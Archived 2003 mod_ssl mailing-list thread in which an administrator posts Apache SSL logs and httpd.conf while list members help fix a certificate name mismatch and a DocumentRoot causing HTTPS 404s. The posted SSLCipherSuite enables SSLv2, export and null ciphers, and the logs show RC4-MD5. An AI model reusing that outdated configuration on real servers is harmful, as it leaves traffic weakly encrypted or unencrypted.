[15/Mar/2003 14:30:20 11314] [info]  Init: 2nd startup round (already=20
detached)
[15/Mar/2003 14:30:20 11314] [info]  Init: Reinitializing OpenSSL library
[15/Mar/2003 14:30:20 11314] [info]  Init: Seeding PRNG with 136 bytes of=
=20
entropy
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary RSA priv=
ate=20
keys (512/1024 bits)
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary DH param=
eters=20
(512/1024 bits)
[15/Mar/2003 14:30:20 11314] [info]  Init: Initializing (virtual) servers=
 for=20
SSL
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring server=20
matrix.pelathe.org:443 for SSL protocol
[15/Mar/2003 14:30:20 11314] [info]  Init: (matrix.pelathe.org:443) RSA s=
erver=20
certificate enables Server Gated Cryptography (SGC)
[15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA s=
erver=20
certificate CommonName (CN) `www.pelathe.org' does NOT match se
rver name!?
[15/Mar/2003 14:34:52 11671] [info]  Connection to child 2 established (s=
erver=20
matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:34:52 11671] [info]  Seeding PRNG with 1160 bytes of entr=
opy
[15/Mar/2003 14:37:04 11671] [info]  Connection: Client IP: 24.124.34.100=
,=20
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[15/Mar/2003 14:37:04 11671] [info]  Initial (No.1) HTTPS request receive=
d for=20
child 2 (server matrix.pelathe.org:443)
[15/Mar/2003 14:37:16 11671] [info]  Subsequent (No.2) HTTPS request rece=
ived=20
for child 2 (server matrix.pelathe.org:443)
[15/Mar/2003 14:37:33 11671] [info]  Connection to child 2 closed with=20
standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:52:36 11499] [info]  Connection to child 1 established (s=
erver=20
matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:52:36 11499] [info]  Seeding PRNG with 1160 bytes of entr=
opy
[15/Mar/2003 14:52:36 11499] [info]  Connection: Client IP: 24.124.34.100=
,=20
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[15/Mar/2003 14:52:36 11499] [info]  Initial (No.1) HTTPS request receive=
d for=20
child 1 (server matrix.pelathe.org:443)
[15/Mar/2003 14:52:52 11499] [info]  Connection to child 1 closed with=20
standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
ssl_engine_log lines 394-440/440 (END)

I'll go ahead and post the mod_ssl section of my httpd.conf as well, sans=
 the=20
descriptive text:



SSLPassPhraseDialog  builtin

#SSLSessionCache        none
#SSLSessionCache        shmht:/var/run/ssl_scache(512000)
#SSLSessionCache        shmcb:/var/run/ssl_scache(512000)
SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:/var/run/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

SSLLog      /var/log/httpd/ssl_engine_log
SSLLogLevel trace





##
## SSL Virtual Host Context
##



DocumentRoot "/srv/www/htdocs"
ServerName matrix.pelathe.org
ServerAdmin tkitchen@pelathe.org
ErrorLog /var/log/httpd/error_log
TransferLog /var/log/httpd/access_log

SSLEngine on

SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /etc/httpd/ssl.crt/www.pelathe.org.crt

SSLCertificateKeyFile /etc/httpd/ssl.key/www.pelathe.org.key

SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt

SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt

SSLCARevocationPath /etc/httpd/ssl.crl

SSLVerifyClient none
SSLVerifyDepth  10

#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
#            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
#           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
#


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



I hope this helps. I'm really becoming baffled by this.


On Thursday 13 March 2003 13:36, you wrote:
> A. Putnam said:
> > Right then. I moved my certificates into their respective directories
> > and  re-reeditted my httpd.conf file to reflect those changes and set
> > the  SSLVerifyClient to 'none'. I was not sure where to go to change
> > the logging  to 'trace' though. But, I can get into the secure server
> > now so it  technically works. (thank you again Camun, and DuFresne an=
d
> > Stromas too)
>
> SSLLogLevel trace
>
> > However, I am finding that all of the pages I've visited while in htt=
ps
> > are  pulling up 404 errors. The same pages pull up fine in http. Do I
> > need to have  a mirrored web directory just for https to get the file=
s
> > to show up or  something? This is the only real conclusion I can thin=
k
> > of.
>
> What does the access log say?
>
> If you still can't figure it out looking at logs you should post your
> httpd.conf>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 19:53:32 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 355862AA02A; Fri, 14 Mar 2003 19:53:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tfmx.com (user.teleformix.com [12.15.20.65])
	by master.modssl.org (Postfix) with ESMTP id 10CA52AA015
	for ; Fri, 14 Mar 2003 19:53:30 +0100 (CET)
Received: from rgedyew2k (rgedye-tfmx.tfmx.com [192.168.5.159])
	by mail.tfmx.com (8.11.6/8.11.6) with SMTP id h2EIrOB21406
	for ; Fri, 14 Mar 2003 12:53:24 -0600
Message-ID: <036901c2ea5a$f6e69ce0$9f05a8c0@rgedyew2k>
From: "Ron Gedye" 
To: 
References: <200303141525.14074.aputnam@pelathe.org> <53472.199.196.144.12.1047584166.squirrel@www.izoard.com> <200303151507.34976.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Fri, 14 Mar 2003 12:53:12 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Gedye" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Quick check...
Check your Docroot (& add  ?).  Just looked at your site & I
get http fine (with content) but https shows SuSE test page.

FYI - to remove this error:
[15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
server
certificate CommonName (CN) `www.pelathe.org' does NOT match se
rver name!?

change this line...
ServerName matrix.pelathe.org
 (no big deal...)

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Saturday, March 15, 2003 3:07 PM
Subject: Re: private key not found


I found the SSLLogLevel, thanks. Here is the engine log from today. I'm not
really sure what to make of it...

[15/Mar/2003 14:30:18 11313] [info]  Server: Apache/1.3.26, Interface:
mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
[15/Mar/2003 14:30:18 11313] [info]  Init: 1st startup round (still not
detached)
[15/Mar/2003 14:30:18 11313] [info]  Init: Initializing OpenSSL library
[15/Mar/2003 14:30:18 11313] [info]  Init: Loading certificate & private key
of SSL-aware server matrix.pelathe.org:443
[15/Mar/2003 14:30:18 11313] [info]  Init: Seeding PRNG with 136 bytes of
entropy
[15/Mar/2003 14:30:18 11313] [info]  Init: Generating temporary RSA private
keys (512/1024 bits)
[15/Mar/2003 14:30:18 11313] [info]  Init: Configuring temporary DH
parameters
(512/1024 bits)
[15/Mar/2003 14:30:20 11314] [info]  Init: 2nd startup round (already
detached)
[15/Mar/2003 14:30:20 11314] [info]  Init: Reinitializing OpenSSL library
[15/Mar/2003 14:30:20 11314] [info]  Init: Seeding PRNG with 136 bytes of
entropy
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary RSA private
keys (512/1024 bits)
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary DH
parameters
(512/1024 bits)
[15/Mar/2003 14:30:20 11314] [info]  Init: Initializing (virtual) servers
for
SSL
[15/Mar/2003 14:30:20 11314] [info]  Init: Configuring server
matrix.pelathe.org:443 for SSL protocol
[15/Mar/2003 14:30:20 11314] [info]  Init: (matrix.pelathe.org:443) RSA
server
certificate enables Server Gated Cryptography (SGC)
[15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
server
certificate CommonName (CN) `www.pelathe.org' does NOT match se
rver name!?
[15/Mar/2003 14:34:52 11671] [info]  Connection to child 2 established
(server
matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:34:52 11671] [info]  Seeding PRNG with 1160 bytes of entropy
[15/Mar/2003 14:37:04 11671] [info]  Connection: Client IP: 24.124.34.100,
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[15/Mar/2003 14:37:04 11671] [info]  Initial (No.1) HTTPS request received
for
child 2 (server matrix.pelathe.org:443)
[15/Mar/2003 14:37:16 11671] [info]  Subsequent (No.2) HTTPS request
received
for child 2 (server matrix.pelathe.org:443)
[15/Mar/2003 14:37:33 11671] [info]  Connection to child 2 closed with
standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:52:36 11499] [info]  Connection to child 1 established
(server
matrix.pelathe.org:443, client 24.124.34.100)
[15/Mar/2003 14:52:36 11499] [info]  Seeding PRNG with 1160 bytes of entropy
[15/Mar/2003 14:52:36 11499] [info]  Connection: Client IP: 24.124.34.100,
Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
[15/Mar/2003 14:52:36 11499] [info]  Initial (No.1) HTTPS request received
for
child 1 (server matrix.pelathe.org:443)
[15/Mar/2003 14:52:52 11499] [info]  Connection to child 1 closed with
standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
ssl_engine_log lines 394-440/440 (END)

I'll go ahead and post the mod_ssl section of my httpd.conf as well, sans
the
descriptive text:



SSLPassPhraseDialog  builtin

#SSLSessionCache        none
#SSLSessionCache        shmht:/var/run/ssl_scache(512000)
#SSLSessionCache        shmcb:/var/run/ssl_scache(512000)
SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:/var/run/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

SSLLog      /var/log/httpd/ssl_engine_log
SSLLogLevel trace





##
## SSL Virtual Host Context
##



DocumentRoot "/srv/www/htdocs"
ServerName matrix.pelathe.org
ServerAdmin tkitchen@pelathe.org
ErrorLog /var/log/httpd/error_log
TransferLog /var/log/httpd/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /etc/httpd/ssl.crt/www.pelathe.org.crt

SSLCertificateKeyFile /etc/httpd/ssl.key/www.pelathe.org.key

SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt

SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt

SSLCARevocationPath /etc/httpd/ssl.crl

SSLVerifyClient none
SSLVerifyDepth  10

#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



I hope this helps. I'm really becoming baffled by this.


On Thursday 13 March 2003 13:36, you wrote:
> A. Putnam said:
> > Right then. I moved my certificates into their respective directories
> > and  re-reeditted my httpd.conf file to reflect those changes and set
> > the  SSLVerifyClient to 'none'. I was not sure where to go to change
> > the logging  to 'trace' though. But, I can get into the secure server
> > now so it  technically works. (thank you again Camun, and DuFresne and
> > Stromas too)
>
> SSLLogLevel trace
>
> > However, I am finding that all of the pages I've visited while in https
> > are  pulling up 404 errors. The same pages pull up fine in http. Do I
> > need to have  a mirrored web directory just for https to get the files
> > to show up or  something? This is the only real conclusion I can think
> > of.
>
> What does the access log say?
>
> If you still can't figure it out looking at logs you should post your
> httpd.conf>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 20:16:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A63C42AA02A; Fri, 14 Mar 2003 20:16:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id 7AFF22AA015
	for ; Fri, 14 Mar 2003 20:16:38 +0100 (CET)
Received: from math209.math.gatech.edu (math209.math.gatech.edu [130.207.146.209])
	by math.gatech.edu (8.12.8/8.12.8) with ESMTP id h2EJGVPg028337
	for ; Fri, 14 Mar 2003 14:16:31 -0500 (EST)
Date: Fri, 14 Mar 2003 14:16:30 -0500 (EST)
From: Carlos Villegas 
To: modssl-users@modssl.org
Subject: Re: Replacing the default HTTPS cert??
In-Reply-To: <003401c2ea51$39025560$6f00000a@resin>
Message-ID: 
References: <003401c2ea51$39025560$6f00000a@resin>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Spam-Level:  (0) 7 required for Spam
X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Carlos Villegas 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Copy your certificate (and private key) to the apropiate places (It
depends on your ssl.conf). By the default configuration, they should go in
the directories ssl.crt and ssl.key under conf.

Carlos

> How can I replace the default HTTPS cert with my own? I installed apache13_modssl from ports, freebsd 5.0.
>
>
> -l0ngb0ng
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 20:37:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E55DA2AA02A; Fri, 14 Mar 2003 20:37:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 2259F2AA015
	for ; Fri, 14 Mar 2003 20:37:38 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 24AE480E1D
	for ; Sat, 15 Mar 2003 16:02:34 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Sat, 15 Mar 2003 16:02:34 -0600
User-Agent: KMail/1.4.3
References: <200303141525.14074.aputnam@pelathe.org> <200303151507.34976.aputnam@pelathe.org> <036901c2ea5a$f6e69ce0$9f05a8c0@rgedyew2k>
In-Reply-To: <036901c2ea5a$f6e69ce0$9f05a8c0@rgedyew2k>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303151602.34721.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Changed the SeverName - thanks, I was wondering about that.

How do I check my Docroot? "& add  ?" What does that mean?


On Friday 14 March 2003 12:53, Ron Gedye wrote:
> Quick check...
> Check your Docroot (& add  ?).  Just looked at your site=
 & I
> get http fine (with content) but https shows SuSE test page.
>
> FYI - to remove this error:
> [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate CommonName (CN) `www.pelathe.org' does NOT match se
> rver name!?
>
> change this line...
> ServerName matrix.pelathe.org
>  (no big deal...)
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Saturday, March 15, 2003 3:07 PM
> Subject: Re: private key not found
>
>
> I found the SSLLogLevel, thanks. Here is the engine log from today. I'm=
 not
> really sure what to make of it...
>
> [15/Mar/2003 14:30:18 11313] [info]  Server: Apache/1.3.26, Interface:
> mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> [15/Mar/2003 14:30:18 11313] [info]  Init: 1st startup round (still not
> detached)
> [15/Mar/2003 14:30:18 11313] [info]  Init: Initializing OpenSSL library
> [15/Mar/2003 14:30:18 11313] [info]  Init: Loading certificate & privat=
e
> key of SSL-aware server matrix.pelathe.org:443
> [15/Mar/2003 14:30:18 11313] [info]  Init: Seeding PRNG with 136 bytes =
of
> entropy
> [15/Mar/2003 14:30:18 11313] [info]  Init: Generating temporary RSA pri=
vate
> keys (512/1024 bits)
> [15/Mar/2003 14:30:18 11313] [info]  Init: Configuring temporary DH
> parameters
> (512/1024 bits)
> [15/Mar/2003 14:30:20 11314] [info]  Init: 2nd startup round (already
> detached)
> [15/Mar/2003 14:30:20 11314] [info]  Init: Reinitializing OpenSSL libra=
ry
> [15/Mar/2003 14:30:20 11314] [info]  Init: Seeding PRNG with 136 bytes =
of
> entropy
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary RSA
> private keys (512/1024 bits)
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary DH
> parameters
> (512/1024 bits)
> [15/Mar/2003 14:30:20 11314] [info]  Init: Initializing (virtual) serve=
rs
> for
> SSL
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring server
> matrix.pelathe.org:443 for SSL protocol
> [15/Mar/2003 14:30:20 11314] [info]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate enables Server Gated Cryptography (SGC)
> [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate CommonName (CN) `www.pelathe.org' does NOT match se
> rver name!?
> [15/Mar/2003 14:34:52 11671] [info]  Connection to child 2 established
> (server
> matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:34:52 11671] [info]  Seeding PRNG with 1160 bytes of
> entropy [15/Mar/2003 14:37:04 11671] [info]  Connection: Client IP:
> 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> [15/Mar/2003 14:37:04 11671] [info]  Initial (No.1) HTTPS request recei=
ved
> for
> child 2 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:37:16 11671] [info]  Subsequent (No.2) HTTPS request
> received
> for child 2 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:37:33 11671] [info]  Connection to child 2 closed with
> standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:52:36 11499] [info]  Connection to child 1 established
> (server
> matrix.pelathe.org:443, client 24.124.34.100)
> [15/Mar/2003 14:52:36 11499] [info]  Seeding PRNG with 1160 bytes of
> entropy [15/Mar/2003 14:52:36 11499] [info]  Connection: Client IP:
> 24.124.34.100, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits)
> [15/Mar/2003 14:52:36 11499] [info]  Initial (No.1) HTTPS request recei=
ved
> for
> child 1 (server matrix.pelathe.org:443)
> [15/Mar/2003 14:52:52 11499] [info]  Connection to child 1 closed with
> standard shutdown (server matrix.pelathe.org:443, client 24.124.34.100)
> ssl_engine_log lines 394-440/440 (END)
>
> I'll go ahead and post the mod_ssl section of my httpd.conf as well, sa=
ns
> the
> descriptive text:
>
> 
>
> SSLPassPhraseDialog  builtin
>
> #SSLSessionCache        none
> #SSLSessionCache        shmht:/var/run/ssl_scache(512000)
> #SSLSessionCache        shmcb:/var/run/ssl_scache(512000)
> SSLSessionCache         dbm:/var/run/ssl_scache
> SSLSessionCacheTimeout  300
>
> SSLMutex  file:/var/run/ssl_mutex
>
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> #SSLRandomSeed startup file:/dev/random  512
> #SSLRandomSeed startup file:/dev/urandom 512
> #SSLRandomSeed connect file:/dev/random  512
> #SSLRandomSeed connect file:/dev/urandom 512
>
> SSLLog      /var/log/httpd/ssl_engine_log
> SSLLogLevel trace
>
> 
>
> 
>
> ##
> ## SSL Virtual Host Context
> ##
>
> 
>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /etc/httpd/ssl.crt/www.pelathe.org.crt
>
> SSLCertificateKeyFile /etc/httpd/ssl.key/www.pelathe.org.key
>
> SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
>
> SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
>
> SSLCARevocationPath /etc/httpd/ssl.crl
>
> SSLVerifyClient none
> SSLVerifyDepth  10
>
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
> #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> #
>
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> I hope this helps. I'm really becoming baffled by this.
>
> On Thursday 13 March 2003 13:36, you wrote:
> > A. Putnam said:
> > > Right then. I moved my certificates into their respective directori=
es
> > > and  re-reeditted my httpd.conf file to reflect those changes and s=
et
> > > the  SSLVerifyClient to 'none'. I was not sure where to go to chang=
e
> > > the logging  to 'trace' though. But, I can get into the secure serv=
er
> > > now so it  technically works. (thank you again Camun, and DuFresne =
and
> > > Stromas too)
> >
> > SSLLogLevel trace
> >
> > > However, I am finding that all of the pages I've visited while in h=
ttps
> > > are  pulling up 404 errors. The same pages pull up fine in http. Do=
 I
> > > need to have  a mirrored web directory just for https to get the fi=
les
> > > to show up or  something? This is the only real conclusion I can th=
ink
> > > of.
> >
> > What does the access log say?
> >
> > If you still can't figure it out looking at logs you should post your
> > httpd.conf>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 14 20:45:18 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 648D02AA02A; Fri, 14 Mar 2003 20:45:18 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tfmx.com (user.teleformix.com [12.15.20.65])
	by master.modssl.org (Postfix) with ESMTP id 0D9892AA015
	for ; Fri, 14 Mar 2003 20:45:16 +0100 (CET)
Received: from rgedyew2k (rgedye-tfmx.tfmx.com [192.168.5.159])
	by mail.tfmx.com (8.11.6/8.11.6) with SMTP id h2EJjCB25546
	for ; Fri, 14 Mar 2003 13:45:12 -0600
Message-ID: <039101c2ea62$336e33b0$9f05a8c0@rgedyew2k>
From: "Ron Gedye" 
To: 
References: <200303141525.14074.aputnam@pelathe.org> <200303151507.34976.aputnam@pelathe.org> <036901c2ea5a$f6e69ce0$9f05a8c0@rgedyew2k> <200303151602.34721.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Fri, 14 Mar 2003 13:45:00 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Gedye" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log

Is DocumentRoot above the actual content of your site? (betting not)  Maybe
compare this setting to what is set for port 80 (http)
Other than that I had no problems with getting to your site via https.

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/home/httpd/html"

There is usually a related setting (maybe not in virtual hosts, little
rusty - brainfog)
#
# This should be changed to whatever you set DocumentRoot to.
#


----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Saturday, March 15, 2003 4:02 PM
Subject: Re: private key not found


Changed the SeverName - thanks, I was wondering about that.

How do I check my Docroot? "& add  ?" What does that mean?


On Friday 14 March 2003 12:53, Ron Gedye wrote:
> Quick check...
> Check your Docroot (& add  ?).  Just looked at your site &
I
> get http fine (with content) but https shows SuSE test page.
>
> FYI - to remove this error:
> [15/Mar/2003 14:30:20 11314] [warn]  Init: (matrix.pelathe.org:443) RSA
> server
> certificate CommonName (CN) `www.pelathe.org' does NOT match se
> rver name!?
>
> change this line...
> ServerName matrix.pelathe.org
>  (no big deal...)
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Saturday, March 15, 2003 3:07 PM
> Subject: Re: private key not found
>
>
> I found the SSLLogLevel, thanks. Here is the engine log from today. I'm
not
> really sure what to make of it...
>
> [15/Mar/2003 14:30:18 11313] [info]  Server: Apache/1.3.26, Interface:
> mod_ssl/2.8.10, Library: OpenSSL/0.9.6g
> [15/Mar/2003 14:30:18 11313] [info]  Init: 1st startup round (still not
> detached)
> [15/Mar/2003 14:30:18 11313] [info]  Init: Initializing OpenSSL library
> [15/Mar/2003 14:30:18 11313] [info]  Init: Loading certificate & private
> key of SSL-aware server matrix.pelathe.org:443
> [15/Mar/2003 14:30:18 11313] [info]  Init: Seeding PRNG with 136 bytes of
> entropy
> [15/Mar/2003 14:30:18 11313] [info]  Init: Generating temporary RSA
private
> keys (512/1024 bits)
> [15/Mar/2003 14:30:18 11313] [info]  Init: Configuring temporary DH
> parameters
> (512/1024 bits)
> [15/Mar/2003 14:30:20 11314] [info]  Init: 2nd startup round (already
> detached)
> [15/Mar/2003 14:30:20 11314] [info]  Init: Reinitializing OpenSSL library
> [15/Mar/2003 14:30:20 11314] [info]  Init: Seeding PRNG with 136 bytes of
> entropy
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary RSA
> private keys (512/1024 bits)
> [15/Mar/2003 14:30:20 11314] [info]  Init: Configuring temporary DH
> parameters
> (512/1024 bits)
